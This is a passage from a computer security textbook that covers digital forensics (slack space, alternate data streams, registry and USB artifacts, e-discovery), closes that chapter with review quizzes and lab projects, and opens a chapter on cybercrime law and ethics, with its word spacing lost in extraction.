isnotedintheinvestigationdocumentation.Itisagoodpracticetowritethelogstoawrite-oncemediasuchasCD-ROM.Whenthecaseactuallygoestotrial,theinvestigatormayneedtorunthetoolonthefilesorlogsagaintoshowthattheyhavenotbeenalteredinanywaysincebeingobtained.
HostForensicsHostforensicsreferstotheanalysisofaspecificsystem.Hostforensicsincludesawiderangeofelements,includingtheanalysisoffilesystemsandartifactsoftheoperatingsystem.Theseelementsoftenarespecifictoindividualsystemsandoperatingsystems,suchasLinuxorWindows.
FileSystemsWhenauserdeletesafile,thefileisnotactuallydeleted.Instead,apointerinafileallocationtableisdeleted.Thispointerwasusedbytheoperatingsystemtotrackdownthefilewhenitwasreferenced,andtheactof“deleting”thefilemerelyremovesthepointerandmarksthecluster(s)holdingthefileasavailablefortheoperatingsystemtouse.Theactualdataoriginallystoredonthediskremainsonthedisk(untilthatspaceisusedagain);itjustisn’trecognizedasacoherentfilebytheoperatingsystem.
PartitionsPhysicalmemorystoragedevicescanbedividedintoaseriesofcontainerscalledpartitions.Apartitionisalogicalstorageunitthatissubsequentlyusedbyanoperationsystem.Systemscanhavemultiplepartitionsforawidevarietyofreasons,rangingfromhostingmultipleoperatingsystemstoperformance-maximizingeffortstoprotectionefforts.Thebroadissueofpartitionoperationandmanagementisoutsidethescopeofthischapter,butthisisacriticaltopictounderstandandexaminewhenlookingatasystemforensically.
FreeSpaceSinceadeletedfileisnotactuallycompletelyerasedoroverwritten,itsitsontheharddiskuntiltheoperatingsystemneedstousethatspaceforanotherfileorapplication.Sometimesthesecondfilethatissavedinthesameareadoesnotoccupyasmanyclustersasthefirstfile,soafragmentoftheoriginalfileisleftover.Theclusterthatholdsthefragmentoftheoriginalfileisreferredtoas
freespacebecausetheoperatingsystemhasmarkeditasusablewhenneeded.Assoonastheoperatingsystemstoressomethingelseinthiscluster,itisconsideredallocated.Theunallocatedclustersstillcontaintheoriginaldatauntiltheoperatingsystemoverwritesthem.Lookingatthefreespacemightrevealinformationleftoverfromfilestheuserthought
weredeletedfromthedrive.
SlackSpaceAnotherplacethatshouldbereviewedisslackspace,whichisdifferentfromfreespace.Whenafileissavedtoaharddriveorotherstoragemedium,theoperatingsystemallocatesspaceinblocksofapredefinedsize,calledclusters.Evenifyourfilecontainsonlytencharacters,theoperatingsystemwillallocateafullcluster—withspaceleftoverinthecluster.Thisisslackspace.Itispossibleforausertohidemaliciouscode,tools,orcluesinslack
space,aswellasinthefreespace.Youmayalsofindinformationinslackspacefromfilesthatpreviouslyoccupiedthatsamecluster.Therefore,aninvestigatorshouldreviewslackspaceusingutilitiesthatcandisplaytheinformationstoredintheseareas.
HiddenFilesTherearenumerouswaystohidedataonasystem.Onemethodistohidefilesbysettingthehiddenattribute,whichlimitsthelistingofthembystandardfileutilities.Devisedsothatsystemfilesthatshouldnotbedirectlymanipulatedarehiddenfromeasyview,thisconceptraisesabroaderquestionwithrespecttoforensics.Howcanauserhideinformationfromeasyaccessibility?Thereisawiderangeofmethodsofhidingfiles,andanyattempttolist
themwouldbelongandsubjecttocontinualchange.Themajoronestypicallyencounteredincludechangingafileextension,encryption,streams,andstorageonotherpartitions.Wehavealreadycoveredpartitions—itisobviousthataforensicinvestigationshouldfind,enumerate,andexploreallpartitions.Streamswillbecoveredinthenextsection.Encrypteddata,byitsverynature,ishiddenfromview.Withoutthekey,modernencryptionmethodsresistanybrute-forceattemptstodeterminethecontents.Itisimportanttofindencrypteddatastoresanddocumentthelocationsforlaterusebylegalcounsel.
Changingafile’sextensiondoesnotactuallyalterthecontentsorusabilityofafile.Itmerelybreakstheautomatedruntimeassociationmanagerthatdetermineswhatexecutableisassociatedwiththefiletypetoproperlyhandleit.Thechallengeofhowtohandlefiletypesgoesbacktotheearlydaysofcomputers,whenthemagicnumbermethodwascreated.Thetermmagicnumberdescribesaseriesofdigitsnearthebeginningofthefilethatprovidesinformationaboutthefileformat.Insomecasesthemagicnumbercanbereadbyhumans,asGIF87aorGIF89aindicatesbothGraphicsInterchangeFormatandthespecification.Otherfiletypesarelessobvious,suchasaTIFFfileonanIntelplatform,whichisIIfollowedby42asatwo-byteinteger(49492A00).Mostintegratedforensictoolsuiteshandlefileidentificationviamagic
numberandarethusabletofindhiddenvideos,pictures,andotheritems.Theotherthingthesetoolscandoiscompletesearchesacrosstheentirestoragestructureforstrings,andthiscanfindmany“hidden”items.
StreamsStreamsisashortnameforAlternateDataStreams,aspecificdatastructureassociatedwithNTFSinWindows.ThenormallocationfordatainanNTFS-basedsystemisinthedatastream,alocationidentifiedbyarecordintheMasterFileTable(MFT)called$DATA:,whichistechnicallyanunnameddatastream.Alternatedatastreamshavenamesandareidentifiedby$DATA:StreamName,whereStreamNameisthenameofthestreambeingused.Streamscanbeusedtohideinformation;althoughtheinformationisstillpresent,mostofthenormalfileutilitiesdonotdealwithstreams,soitwillnotbeseen.Forensictoolsuiteshavetoolsthatcansearchfor,reporton,andanalyzestreamdataonWindowssystems.
WindowsMetadataMicrosoftWindows–basedsystemshaveawiderangeofartifactswithforensicvalue.Beforeweexaminesomeoftheseartifacts,itisimportant
tounderstandwhytheyexist.Thevastmajorityofartifactsexistforthepurposeofimprovingtheuserexperience.Trackingwhatusersdoandhavedoneandmakingthatinformationavailabletotheoperatingsystemtoimprovefutureuseisoneoftheprimaryreasonsfortheinformation;itsforensicvalueissecondary.
RegistryAnalysisThefirstandforemostWindowsartifactisthesystemRegistry,whichactsadatabaserepositoryofawholehostofinformationandprovidesaone-stopshopforawiderangeofWindowsforensicartifacts—whatapplicationshavebeeninstalled,useractivity,activityassociatedwithexternaldevices,andmore.Althoughthespecificartifactsneededinaninvestigationdifferbasedonthescopeoftheinvestigation,itissafetoassumethatmetadatarecordedbytheWindowsoperatingsystemwillserveausefulpurposeintheinvestigation,especiallysincetheRegistryisstoredbyuserandthereforetheactivityrecordedintheRegistryisattributabletoauser.ThelistofartifactsstoredbytheRegistryisextremelylong,butsomeof
themajoronesincludeeventlogsofawiderangeofsystemandsecurityinformation.Thereisalsoawiderangeoffileactivityartifactsthatcanbeanalyzed,includinganalysisofshellbags,whichprovidesevidenceoffolderopening.LNKfilesandmostrecentlyused(MRU)elementscanpointtofilesystemactivity.Awiderangeofdate/timestampsonfiles,evendeletedfiles,canbepresentforexamination.TherearespecifictoolsetsdesignedtoforensicallyexploretheRegistryandretrievethedesiredartifactsfromthisvoluminousstore.
TechTip
WindowsUSBAnalysisWindowsrecordsawidearrayofinformationoneachUSBdeviceusedinthesystem,including:
Vendor/make/versionandpossiblyuniqueserialnumber
VolumenameandserialnumberLastdriveletterassigned
MountPoints2,aregistryentrythatstoresthelastdrivemappingperuserUsernamethatusedtheUSBdevice
TimeoffirstUSBdeviceconnectionTimeoflastUSBdeviceconnection
TimeoflastUSBdeviceremoval
Asmentionedbeforeandwillbementionedagain,Windowsforensicanalysisisnodifferentfromanyotherforensicanalysiswithrespecttoforensicprocedures.Skillandproficiencyinforensicproceduresisthemostimportantissuewhenanalyzingasystem,becausedamagemaymakeuseoftheinformationimpossible.
LinuxMetadataLinuxsystemshavetheirownsetsofartifacts.Fromaforensicsperspective,LinuxsystemsdifferfromWindowssystemsinthreemainways:
NoregistryProgramdataisstoredinscatteredlocations.DifferentfilesystemAmultitudeofdifferentfilesystemsareused,eachwithdifferentattributes.
PlaintextaboundsFilesanddatatendtobeinplaintext,whichimpactssearching.
Thelackofaregistrytoholdsystemandprograminformationdoesnotmeanthattheinformationisnotthere;itjustmeansthatitisdistributed.Thesameistrueoffilesystems.Ratherthanofferingonlytwofilesystemstructures(NTFSandFAT),Linuxcomeswithawholehostofdifferentforms.Eachofthesehasquirks,suchasnofilecreationdatesinmanyof
them,andthezeroingofmetadatawhenfilesaredeletedresultsinforensicchallenges.WhenitcomestoperformingforensicsonaLinuxsystem,thevalueof
agoodsysadmincannotbeunderstated.ManyoftheartifactsofactivityonaLinuxsystemarescatteredtovariouslocallocations,andagoodsysadmincanassistinlocatingandrecoveringtheessentialelementsforanalysis.Thisisnotalicenseforasysadmintobeginperformingforensicactivities!Thesamerulesandproceduralrequirementslistedearlierstillapply,andinmostcasesthisnecessitatestheuseofforensicallytrainedprofessionals.
DeviceForensicsDeviceforensicsistheapplicationofdigitalforensicprinciplestodevices—mobilephones,tablets,theendlesslistofdevicesthatcomprisethe“InternetofThings,”andmore.Thefactthatitisadevicedoesnotchangetheprinciplespertainingtothecollectionandhandlingofevidence.Alloftheforensicprinciplesstillapplyandarejustasimportant.Whatdoeschangearethetoolsandprocessesemployedtoretrieveandanalyzethedata.Thisisbecausethefilesystems,datastructures,operatingsystems,andartifactsaredifferentthanthoseintheworldofserversandPCs.
TechTip
SSDForensicsTheadventofsolidstatedrivesbringssubstantialimprovementsinperformance.Italsobringsnewissueswithrespecttoforensics.Becauseofthewaythesystemisdesigned,alotof“standard”artifactsthatwouldbefoundinamagneticmemorysystemarenotpresentinsolidstatedrives.Asthesedrivesarecommonindevices,forensicanalystshavetotakeallofthesetechnicalissuesintoconsiderationwhenattemptingtoreconstructwhathappened.
NetworkForensics
Networkforensicsisthecapture,recording,andanalysisofnetworkeventsinordertodiscoverthesourceofnetworkproblemsorsecurityincidents.Examiningnetworksinaforensicfashionintroducesseveralchallenges.Firstisscale.Thescaleofanetworkisrelatedtothenumberofnodesandthespeedoftraffic.Secondistheissueofvolume.Packetcaptureisnottechnicallydifficult,butitcannecessitatelargequantitiesofstorage.Andalthoughstorageisrelativelycheap,largenumbersofpacketscanbedifficulttosortthroughandanalyze.Becauseoftheseissues,—networkforensicsbecomesanissueofspecificity;ifyouknowwhattargetandwhatprotocolsyouarelookingfor,youcanselectivelycaptureandanalyzethetrafficforthosesegmentsandhavedatathatisuseful.Butthereinliestheotherchallenge.Networkdataistemporal.Itexistswhilethepacketisintransitandthenitisgone,forever.MetadatasuchasNetFlowdatacanprovidesomeinformation,butitdoesnotcontainanycontentofthedatabeingtransmitted.Asageneral-purposetool,networkforensicsisnearlyimpossible
becauseofthescaleissues.Butinspecificsituations,suchasinfrontofhigh-valuetargetsthathavelimiteddatamovement,itcanprovetobevaluable.Itcanalsobevaluableintroubleshootingongoingincidentsandproblemsinthenetwork.Thesamerulesapplytonetworkforensicsasapplytoallotherforensic
collectionefforts.Preservingtheintegrityofthedataisparamount,andmaintainingcontroloverthedataisalwaysachallenge.Forensicrules(admissibility,chainofcustody,etc.)donotchangebecausethesourceofdatahaschanged.
E-DiscoveryElectronicdiscovery,ore-discovery,isthetermusedforthedocumentanddataproductionrequirementsaspartoflegaldiscoveryincivillitigation.Whenacivillawsuitisfiled,undercourtapproval,afirmcanbecompelledtoturnoverspecificdatafromsystemspursuanttothelegalissueathand.Electronicinformationisconsideredtobethesameaspaper
documentsinsomerespectsandcompletelydifferentinothers.Theevidentiaryvaluecanbeidentical.Thefragilitycanbesubstantial—electronicrecordscanbechangedwithoutleavingatrace.Electronicdocumentscanalsohavemetadataassociatedwiththedocuments,suchaswhoeditedthedocument,previousversioninformation,andmore.Oneofthepressingchallengesintoday’senterpriserecordstoreisthe
maintenanceofthevolumesofelectronicinformation.Keepingtrackoftheinformationstoresbasedonawiderangeofsearchtermsisessentialtocomplywithe-discoveryrequests.Itiscommonforsystemstouseforensicprocessesandtoolstoperforme-discoverysearches.
ReferenceModelEDRM,acoalitionofconsumersandprovidersfocusedonimprovinge-discoveryandinformationgovernance,hascreatedareferencemodelfore-discovery.TheElectronicDiscoveryReferenceModel,showninFigure23.4,providesaframeworkfororganizationstopreparefore-discovery.ThemajorstepsoftheframeworkarethoroughlydescribedontheEMDRwebsite(http://edrm.net).AdditionalresourcesavailablefromEDRMincludeXMLschemas,glossaries,metric,andmore.
•Figure23.4ElectronicDiscoveryReferenceModel(courtesyofEDRM,EDRM.net)
BigDataItmayseemthatbigdataisalltherageinbusinesstoday,butinrealityitissimplyadescriptionofthetimes.Wehavecreatedlargedatastoresinmostenterprises,abyproductofcheapstorageandtheubiquityoftheInternet.Bigdataisanissueine-discoveryaswell.Thecataloging,storage,andmaintenanceofcorporaterecordsoftenbecomesabigdataissue.Thisfacilitatestheuseofbigdatamethodsinmanycases.Thisisanareaofrapiddevelopment,bothforforensicsande-discovery,asdatavolumescontinuetogrowexponentially.
CloudThecloudhasbecomearesourceforenterpriseITsystems,andassuchitisintimatelyinvolvedinbothe-discoveryandforensics.Havingdatathatmayormaynotbedirectlyaccessedbythetoolsofe-discoveryandforensicscancomplicatetheneededprocesses.Anadditionalcomplicationisthelegalissuesassociatedwiththecontractsbetweentheorganizationandthecloudprovider.Asbothforensicsande-discoveryaresecondaryprocessesfromabusinessperspective,theymayormaynotbeaddressedinastandardcloudagreement.Becausetheseprocessescanbecomeimportant—andiftheydo,itmaybetoolatetocontractuallyaddressthem—itbehoovesanorganizationtopreparebyaddressingthemincloudagreementswiththirdparties.
Chapter23Review
LabManualExercisesThefollowinglabexercisesfromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providepractical
applicationofmaterialcoveredinthischapter:
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutincidentresponseandforensics.
Explorethebasicsofdigitalforensics
Digitalforensicsisthecollectionofprocessesandproceduresusedtopreparedigitalinformationforuseinlegaloradministrativeproceedings.
Becauseoftheimportanceofveracityandthefragilityofdigitaldatatointegrityviolationsthatcannotbedetected,itisimperativethatprocessesbecompleteandcomprehensive.
Identifytherulesandtypesofevidence
Evidencemustmeetthethreestandardsofbeingsufficient,competent,andrelevantifitistobeusedinlegalproceedings.
Therearefourdifferenttypesofevidence:direct,real,documentary,anddemonstrative.
Therearethreerulesregardingevidence:thebestevidencerule,theexclusionaryrule,andthehearsayrule.
Collectevidence
Evidencemustbeproperlycollected,protected,andcontrolledtobeofvalueduringcourtordisciplinaryactivities.
Whenacquiringevidence,onemustbedeliberatetoensureevidenceisnotdamagedandoperationsarenotnegativelyimpacted.
Preserveevidence
Evidencemustbeproperlymarkedsothatitcanbereadilyidentifiedasthatparticularpieceofevidencegatheredatthescene.
Evidencemustbeprotectedsothatitisnottamperedwith,damaged,orcompromised.
Evidenceshouldbetransportedcautiouslytoensurecustodyoftheevidenceismaintainedandtheevidenceitselfisnottamperedwithordamaged.
Evidenceshouldbestoredinproperlycontrolledareasandconditions.
Whenconductinganinvestigationoncomputercomponents,onemustbedeliberateandcautioustoensureevidenceisnotdamaged.
Maintainaviablechainofcustody
Achainofcustodythataccountsforallpersonswhohandledorhaveaccesstotheevidencemustbemaintainedtopreventevidencetamperingordamage.
Investigateacomputercrimeorpolicyviolation
Informationcanberecordedandpossiblyhiddeninvariouswaysonacomputer.Sometimesinformationwillbehiddenineitherthefreespaceortheslackspaceofthecomputer’sdiskdrive.
Freespaceisthespace(clusters)onastoragemediumthatisavailablefortheoperatingsystemtouse.
Slackspaceistheunusedspaceonadiskdrivecreatedwhenafileissmallerthantheallocatedunitofstorage,suchasacluster.
Theuseofamessagedigestorhashingalgorithmisessentialtoensurethatinformationstoredonacomputer’sdiskdriveshasnotbeenchanged.
Iftheinformationinthedatastreamorfileischanged,adifferentmessagedigestwillresult,indicatingthefilehasbeentamperedwith.
Forensicanalysisofdatastoredonaharddrivecanbeginoncethedrivehasbeenimagedandmessagedigestsofimportantfileshavebeencalculatedandstored.
AnalysistypicallyinvolvesinvestigatingtheRecycleBin,webbrowserandaddressbarhistoryfiles,cookiefiles,temporaryInternetfilefolders,suspectfiles,andfreespaceandslackspace.
Experienceandknowledgeareyourmostvaluabletoolsavailablewhenperformingcomputerforensicactivities.
ExamineSystemartifacts
Differentsystemscanhavedifferentartifactsbasedontheoperatingsystemandequipmentemployed.
WindowsandLinuxsystemshavemanysimilarartifacts,althoughtheyarelocatedindifferentareasandpreservedindifferentways.
DevelopForensicpoliciesandprocedures
Theoverarchingprincipleforalldigitalforensicinvestigationsis
properprocedures.Anydeviationfromproperprocedurescanpermanentlyalterevidenceandrenderinformationunusableinfollow-onprocedures,whethercriminal,civil,oradministrative.Ensuringproperproceduresbytrainedprofessionalsisessentialfromthefirstaspectofaninvestigation.
Examinethepoliciesandproceduresassociatedwithe-discovery
E-discovery,isthetermusedforthedocumentanddataproductionrequirementsaspartoflegaldiscoveryincivillitigation
TheElectronicDiscoveryReferenceModel,providesaframeworkfororganizationstopreparefore-discovery.
KeyTermsbestevidencerule(677)competentevidence(677)demonstrativeevidence(676)deviceforensics(688)directevidence(676)documentaryevidence(676)evidence(675)exclusionaryrule(677)forensics(675)freespace(686)hearsayrule(677)magicnumber(687)networkforensics(689)partition(686)realevidence(676)relevantevidence(677)slackspace(686)
stream(687)sufficientevidence(677)writeblocker(683)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.EvidencecollectedinviolationoftheFourthAmendmentoftheU.S.Constitution,theElectronicCommunicationsPrivacyAct(ECPA),orotheraspectsoftheU.S.Codemaynotbeadmissibletoacourtunderthetermsofthe_______________.
2.Evidencethatislegallyqualifiedandreliableis_______________.3.Documents,verbalstatements,andmaterialobjectsadmissibleina
courtoflawarecalled_______________.
4.Therulewherebycourtspreferoriginalevidenceratherthanacopytoensurethatnoalterationoftheevidence(whetherintentionalorunintentional)hasoccurredistermedthe_______________.
5.Evidencethatisconvincingormeasuresupwithoutquestionis_______________.
6._______________isthepreservation,identification,documentation,andinterpretationofcomputerdatatobeusedinlegalproceedings.
7._______________isevidencethatismaterialtothecaseorhasabearingonthematterathand.
8._______________istheunusedspaceonadiskdrivewhenafileissmallerthantheallocatedunitofstorage.
9._______________isoraltestimonyorotherevidencethatprovesaspecificfact(suchasaneyewitness’sstatement,fingerprint,photo,
andsoon).Theknowledgeofthefactsisobtainedthroughthefivesensesofthewitness.Therearenoinferencesorpresumptions.
10._______________istheremainingsectorsofapreviouslyallocatedfilethatareavailablefortheoperatingsystemtouse.
Multiple-ChoiceQuiz1.Whichofthefollowingcorrectlydefinesevidenceasbeing
competent?
A.Theevidenceismaterialtothecaseorhasabearingonthematterathand.
B.Theevidenceispresentedintheformofbusinessrecords,printouts,orotheritems.
C.Theevidenceisconvincingormeasuresupwithoutquestion.
D.Theevidenceislegallyqualifiedandreliable.
2.Whichofthefollowingcorrectlydefinesevidenceasbeingrelevant?
A.Theevidenceismaterialtothecaseorhasabearingonthematterathand.
B.Theevidenceispresentedintheformofbusinessrecords,printouts,orotheritems.
C.Theevidenceisconvincingormeasuresupwithoutquestion.
D.Theevidenceislegallyqualifiedandreliable.
3.Whichofthefollowingcorrectlydefinesdocumentaryevidence?A.Theevidenceispresentedintheformofbusinessrecords,
printouts,manuals,andotheritems.
B.Theknowledgeofthefactsisobtainedthroughthefivesenses
ofthewitness.
C.Theevidenceisusedtoaidthejuryandmaybeintheformofamodel,experiment,chart,orotheritemandbeofferedtoproveaneventoccurred.
D.Physicalevidencethatlinksthesuspecttothesceneofacrime.
4.Whichofthefollowingcorrectlydefinesrealevidence?A.Theevidenceisconvincingormeasuresupwithoutquestion.
B.Theevidenceismaterialtothecaseorhasabearingonthematterathand.
C.Theevidenceisusedtoaidthejuryandmaybeintheformofamodel,experiment,chart,orotheritemandbeofferedtoproveaneventoccurred.
D.Tangibleobjectsthatproveordisproveafact.
5.Whichofthefollowingistheleastrigorousinvestigativemethod?A.Usingadedicatedforensicworkstation
B.Verifyingsoftwareonasuspectsystemandusingthatsoftwarefortheinvestigation
C.Examiningthesuspectsystemusingitssoftwarewithoutverification
D.BootingthesuspectsystemwithaverifiedfloppyorCD,kernel,andtools
6.Whichofthefollowingcorrectlydefinesslackspace?A.Thespaceonadiskdrivethatisoccupiedbythebootsector
B.Thespacelocatedatthebeginningofapartition
C.Theremainingsectorsofapreviouslyallocatedfilethatare
availablefortheoperatingsystemtouse
D.Theunusedspaceonadiskdrivewhenafileissmallerthantheallocatedunitofstorage
7.Whichofthefollowingcorrectlydescribestheminimumcontentsofanevidencecontrollogbook?
A.Description,Investigator,Case#,Date,Time,Location,Reason
B.Description,Investigator,Case#,Date,Location,Reason
C.Description,Case#,Date,Time,Location,Reason
D.Description,Coroner,Case#,Date,Time,Location,Reason
8.Whichofthefollowingcorrectlydescribesthechainofcustodyforevidence?
A.Theevidenceisconvincingormeasuresupwithoutquestion.
B.Accountsforallpersonswhohandledorhadaccesstoaspecificitemofevidence.
C.Description,Investigator,Case#,Date,Time,Location,Reason.
D.Theevidenceislegallyqualifiedandreliable.
9.Whichofthefollowingcorrectlydefinestheexclusionaryrule?A.AnyevidencecollectedinviolationoftheFourthAmendment
isnotadmissibleasevidence.
B.Theevidenceconsistsoftangibleobjectsthatproveordisproveafact.
C.Theknowledgeofthefactsisobtainedthroughthefivesensesofthewitness.
D.Theevidenceisusedtoaidthejuryandmaybeintheformofa
model,experiment,chart,orthelike,offeredtoproveaneventoccurred.
10.Whichofthefollowingcorrectlydefinesfreespace?A.Theunusedspaceonadiskdrivewhenafileissmallerthanthe
allocatedunitofstorage(suchasasector)
B.Thespaceonadiskdrivethatisoccupiedbythebootsector
C.Thespacelocatedatthebeginningofapartition
D.Theremainingsectorsofapreviouslyallocatedfilethatareavailablefortheoperatingsystemtouse
EssayQuiz1.Asupervisorhasbroughttoyourofficeaconfiscatedcomputerthat
wasallegedlyusedtoviewinappropriatematerial.Hehasaskedyoutolookforevidencetosupportthisallegation.Becauseyouworkforasmallcompany,youdonothaveanextracomputeryoucandedicatetoyouranalysis.Howwouldyoubootthesystemandbeginforensicanalysis?Provideareasonforyourmethod.
2.Explainwhyyoushouldalwayssearchthefreespaceandslackspaceifyoususpectapersonhasdeliberatelydeletedfilesorinformationonaworkstationthatyouareanalyzing.
3.Youhavebeenaskedbymanagementtosecurethelaptopcomputerofanindividualwhowasjustdismissedfromthecompanyunderunfavorablecircumstances.Pretendthatyourowncomputeristhelaptopthathasbeensecured.Makethefirstentryinyourlogbookanddescribehowyouwouldstartthisincidentoffcorrectlybyproperlyprotectingandsecuringtheevidence.
LabProjects
•LabProject23.1UseanMD5orSHA-1algorithmtoobtainthehashvalueforafileofyourchoice.Recordthehashvalue.Changethefilewithawordprocessorortexteditor.Obtainthehashvalueforthemodifiedfile.Comparetheresult.
•LabProject23.2Tounderstandwhatinformationisstoredonyourcomputer,examinethecontentsoftheTemporaryInternetFilesfoldersonyourowncomputer.Reviewthefilenamesandexaminethecontentsofafewofthefiles.Describehowthisinformationcouldbeusedasevidenceofacrime.
chapter24 LegalIssuesandEthics
Ifyouhavetenthousandregulationsyoudestroyallrespectforthelaw.
—WINSTONCHURCHILL
C
Inthischapter,youwilllearnhowto
Explainthelawsandrulesconcerningimportingandexportingencryptionsoftware
Identifythelawsthatgoverncomputeraccessandtrespass
Identifythelawsthatgovernencryptionanddigitalrightsmanagement
Describethelawsthatgoverndigitalsignatures
Exploreethicalissuesassociatedwithinformationsecurity
omputersecurityisnodifferentfromanyothersubjectinoursociety;astechnologicalchangesresultinconflicts,lawsareenactedtoenabledesiredbehaviorsandprohibitundesiredbehaviors.Theone
substantialdifferencebetweenthisaspectofoursocietyandothersisthatthespeedofadvancementintheinformationsystemsworldasdrivenbybusiness,computernetworkconnectivity,andtheInternetismuchgreaterthaninthelegalsystemofcompromiseandlawmaking.Insomecases,lawshavebeenoverlyrestrictive,limitingbusinessoptions,suchasintheareaofimportingandexportingencryptiontechnology.Inothercases,legislationhasbeenslowincoming,andthisfacthasstymiedbusinessinitiatives,suchasindigitalsignatures.Andinsomeareas,legislationhasbeenbothtoofastandtooslow,asinthecaseofprivacylaws.Onethingiscertain:youwillneversatisfyeveryonewithalaw,butitdoesdelineatetherulesofthegame.
Thecyber-lawenvironmenthasnotbeenfullydefinedbythecourts.Lawshavebeenenacted,butuntiltheyhavebeenfullytestedandexploredbycasesincourt,theexactlimitsaresomewhatunknown.Thismakessomeaspectsofinterpretationmorechallenging,butthevastmajorityofthelegalenvironmentisknownwellenoughthateffectivepoliciescanbeenactedtonavigatethisenvironmentproperly.Policiesandproceduresaretoolsyouusetoensureunderstandingandcompliancewithlawsandregulationsaffectingcyberspace.
CybercrimeOneofthemanywaystoexaminecybercrimeistostudyhowthecomputerisinvolvedinthecriminalact.Threetypesofcomputercrimescommonlyoccur:computer-assistedcrime,computer-targetedcrime,andcomputer-incidentalcrime.Thedifferentiatingfactorisinhowthecomputerisspecificallyinvolvedfromthecriminal’spointofview.Justascrimeisnotanewphenomenon,neitheristheuseofcomputers,andcybercrimehasahistoryofseveraldecades.
ExamTip:Therearethreeformsofcomputerinvolvementincriminalactivity:
Thecomputerasatoolofthecrime
ThecomputerasavictimofacrimeThecomputerthatisincidentaltoacrime
Whatisnewishowcomputersareinvolvedincriminalactivities.Thedaysofsimpleteenagehackingactivitiesfromabedroomhavebeenreplacedbyorganizedcrime–controlledbotnets(groupsofcomputerscommandeeredbyamalicioushacker)andactsdesignedtoattackspecifictargets.Thelegalsystemhasbeenslowtoreact,andlawenforcementhasbeenhamperedbytheirownchallengesinrespondingtothenewthreatsposedbyhigh-techcrime.Whatcomestomindwhenmostpeoplethinkaboutcybercrimeisa
computerthatistargetedandattackedbyanintruder.Thecriminalattemptstobenefitfromsomeformofunauthorizedactivityassociatedwithacomputer.Inthe1980sand’90s,cybercrimewasmainlyvirusandwormattacks,eachexactingsomeformofdamage,yetthegainforthecriminalwasusuallynegligible.Enterthe21stcentury,withnewformsofmalware,rootkits,andtargetedattacks;criminalscannowtargetindividualusersandtheirbankaccounts.Inthecurrentenvironmentitis
easytopredictwherethisformofattackwilloccur—ifmoneyisinvolved,acriminalwillattempttoobtainacut.Acommonmethodofcriminalactivityiscomputer-basedfraud.AdvertisingontheInternetisbigbusiness,andhencethe“new”crimeofclickfraudisnowaconcern.Clickfraudinvolvesapieceofmalwarethatdefraudstheadvertisingrevenuecounterenginethroughfraudulentuserclicks.TheleaderintheInternetauctionspace,eBay,anditssubsidiary,
PayPal,arefrequenttargetsoffraud.Whetherthefraudoccursbyfraudulentlisting,fraudulentbidding,oroutrightstealingofmerchandise,theresultsarethesame:acrimeiscommitted.Asusersmovetowardonlinebankingandstocktrading,somovesthecriminalelement.Malwaredesignedtoinstallakeystrokeloggerandthenwatchforbank/brokerageloginsiscommonontheInternet.Oncetheattackerfindsthetargets,hecanbeginlootingaccounts.Hisriskofgettingcaughtandprosecutedisexceedinglylow.WalkintoabankintheUnitedStatesandrobit,andtheoddsarebetterthan95percentthatyouwillbedoingtimeinfederalprisonaftertheFBIhuntsyoudownandslapsthecuffsonyourwrists.Dothesamecrimeviaacomputer,andtheoddsareevenbetterfortheopposite:lessthan1percentoftheseattackersarecaughtandprosecuted.Thelowriskofbeingcaughtisoneofthereasonsthatcriminalsare
turningtocomputercrime.Justascomputershavebecomeeasyforordinarypeopletouse,thetrendcontinuesforthecriminalelement.Today’scybercriminalsusecomputersastoolstostealintellectualpropertyorothervaluabledataandthensubsequentlymarketthesematerialsthroughundergroundonlineforums.Usingthecomputertophysicallyisolatethecriminalfromthedirecteventofthecrimehasmadetheinvestigationandprosecutionofthesecrimesmuchmorechallengingforauthorities.Thelastwaycomputersareinvolvedwithcriminalactivitiesisthrough
incidentalinvolvement.Backin1931,theU.S.governmentusedaccountingrecordsandtaxlawstoconvictAlCaponeoftaxevasion.Today,similarrecordsarekeptoncomputers.Computersarealsousedtotrafficchildpornographyandengageinotherillicitactivities—these
computersactmoreasstoragedevicesthanasactualtoolstoenablethecrime.Becausechildpornographyexistedbeforecomputersmadeitsdistributioneasier,thecomputerisactuallyincidentaltothecrimeitself.Withthethreeformsofcomputerinvolvementincriminalactivities,
multipliedbythemyriadofwaysacriminalcanuseacomputertostealordefraud,addedtotheindirectconnectionmediatedbythecomputerandtheInternet,computercrimeofthe21stcenturyisacomplexproblemindeed.Technicalissuesareassociatedwithalltheprotocolsandarchitectures.Amajorlegalissueistheeducationoftheentirelegalsystemastotheseriousnatureofcomputercrimes.AllthesefactorsarefurthercomplicatedbytheuseoftheInternettoseparatethecriminalandhisvictimgeographically.Imaginethisdefense:“Yourhonor,asshownbymyclient’selectronicmonitoringbracelet,hewasinhisapartmentinCaliforniawhenthiscrimeoccurred.ThevictimclaimsthatthemoneywasremovedfromhislocalbankinNewYorkCity.Now,lasttimeIchecked,NewYorkCitywasalongwayfromLosAngeles,sohowcouldmyclienthaverobbedthebank?”
TechTip
FBIPrioritiesInthepost-9/11environment,federallawenforcementprioritiesshiftedtowardterrorism.Duringthereassessmentofnationallawenforcementpriorities,cyber-relatedcrimesincreasedinimportance,movingtonumberthreeontheFBIprioritylist.Asof2014,theprioritiesfortheFBIare(www.fbi.gov/quickfacts.htm)asfollows:
1.ProtecttheUnitedStatesfromterroristattack.
2.ProtecttheUnitedStatesagainstforeignintelligenceoperationsandespionage.3.ProtecttheUnitedStatesagainstcyber-basedattacksandhigh-technologycrimes.
4.Combatpubliccorruptionatalllevels.5.Protectcivilrights.
6.Combattransnational/nationalcriminalorganizationsandenterprises.7.Combatmajorwhite-collarcrime.
8.Combatsignificantviolentcrime.
9.Supportfederal,state,local,andinternationalpartners.10.UpgradetechnologytosuccessfullyperformtheFBI’smission.
CommonInternetCrimeSchemesTofindcrime,justfollowthemoney.IntheUnitedStates,theFBIandtheNationalWhiteCollarCrimeCenter(NW3C)havejoinedforcesindevelopingtheInternetCrimeComplaintCenter(IC3),anonlineclearinghousethatcommunicatesissuesassociatedwithcybercrime.OneoftheitemsprovidedtotheonlinecommunityisalistofcommonInternetcrimeschemesandexplanationsofeach(www.ic3.gov/crimeschemes.aspx).Aseparatelistoffersadviceonhowtopreventthesecrimesthroughindividualactions(www.ic3.gov/preventiontips.aspx).
